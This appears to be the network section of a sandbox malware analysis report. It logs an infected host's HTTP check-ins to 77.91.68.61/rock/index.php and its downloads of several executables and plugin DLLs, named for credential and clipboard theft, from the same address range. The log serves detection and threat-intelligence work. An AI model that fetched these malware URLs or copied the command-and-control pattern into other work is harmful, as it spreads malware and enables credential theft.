Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
- TCP Requests
-
-
192.168.56.101:49177 77.91.124.156:19071
-
192.168.56.101:49201 77.91.124.156:19071
-
192.168.56.101:49180 77.91.68.1:80
-
192.168.56.101:49187 77.91.68.1:80
-
192.168.56.101:49193 77.91.68.3:80
-
192.168.56.101:49179 77.91.68.61:80
-
192.168.56.101:49184 77.91.68.61:80
-
192.168.56.101:49197 77.91.68.61:80
-
192.168.56.101:49207 77.91.68.61:80
-
POST
200
http://77.91.68.61/rock/index.php
REQUEST
RESPONSE
BODY
POST /rock/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.61
Content-Length: 90
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Aug 2023 23:32:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 242
Content-Type: text/html; charset=UTF-8
GET
200
http://77.91.68.1/new/foto5566.exe
REQUEST
RESPONSE
BODY
GET /new/foto5566.exe HTTP/1.1
Host: 77.91.68.1
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 07 Aug 2023 07:31:12 GMT
Accept-Ranges: bytes
ETag: "41875e241c9d91:0"
Server: Microsoft-IIS/10.0
Date: Mon, 07 Aug 2023 07:32:25 GMT
Content-Length: 568832
POST
200
http://77.91.68.61/rock/index.php
REQUEST
RESPONSE
BODY
POST /rock/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.61
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Aug 2023 23:32:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 3
Content-Type: text/html; charset=UTF-8
GET
200
http://77.91.68.1/new/fotod250.exe
REQUEST
RESPONSE
BODY
GET /new/fotod250.exe HTTP/1.1
Host: 77.91.68.1
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 07 Aug 2023 07:30:24 GMT
Accept-Ranges: bytes
ETag: "57a4e371c9d91:0"
Server: Microsoft-IIS/10.0
Date: Mon, 07 Aug 2023 07:32:29 GMT
Content-Length: 569856
POST
200
http://77.91.68.61/rock/index.php
REQUEST
RESPONSE
BODY
POST /rock/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.61
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Aug 2023 23:32:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 3
Content-Type: text/html; charset=UTF-8
GET
200
http://77.91.68.1/smo/du.exe
REQUEST
RESPONSE
BODY
GET /smo/du.exe HTTP/1.1
Host: 77.91.68.1
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 26 Jun 2023 16:10:23 GMT
Accept-Ranges: bytes
ETag: "1c2f35b648a8d91:0"
Server: Microsoft-IIS/10.0
Date: Mon, 07 Aug 2023 07:32:33 GMT
Content-Length: 30720
POST
200
http://77.91.68.61/rock/index.php
REQUEST
RESPONSE
BODY
POST /rock/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.61
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Aug 2023 23:32:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 3
Content-Type: text/html; charset=UTF-8
GET
200
http://77.91.68.3/fuzz/faman.exe
REQUEST
RESPONSE
BODY
GET /fuzz/faman.exe HTTP/1.1
Host: 77.91.68.3
HTTP/1.1 200 OK
Date: Sun, 06 Aug 2023 23:32:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 06 Aug 2023 23:13:32 GMT
ETag: "27c52f-6024947477f00"
Accept-Ranges: bytes
Content-Length: 2606383
Content-Type: application/x-msdos-program
POST
200
http://77.91.68.61/rock/index.php
REQUEST
RESPONSE
BODY
POST /rock/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.61
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Aug 2023 23:32:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 3
Content-Type: text/html; charset=UTF-8
GET
404
http://77.91.68.61/rock/Plugins/cred64.dll
REQUEST
RESPONSE
BODY
GET /rock/Plugins/cred64.dll HTTP/1.1
Host: 77.91.68.61
HTTP/1.1 404 Not Found
Date: Sun, 06 Aug 2023 23:33:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
GET
200
http://77.91.68.61/rock/Plugins/clip64.dll
REQUEST
RESPONSE
BODY
GET /rock/Plugins/clip64.dll HTTP/1.1
Host: 77.91.68.61
HTTP/1.1 200 OK
Date: Sun, 06 Aug 2023 23:33:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 24 Jul 2023 12:36:25 GMT
ETag: "16400-6013adce177e0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts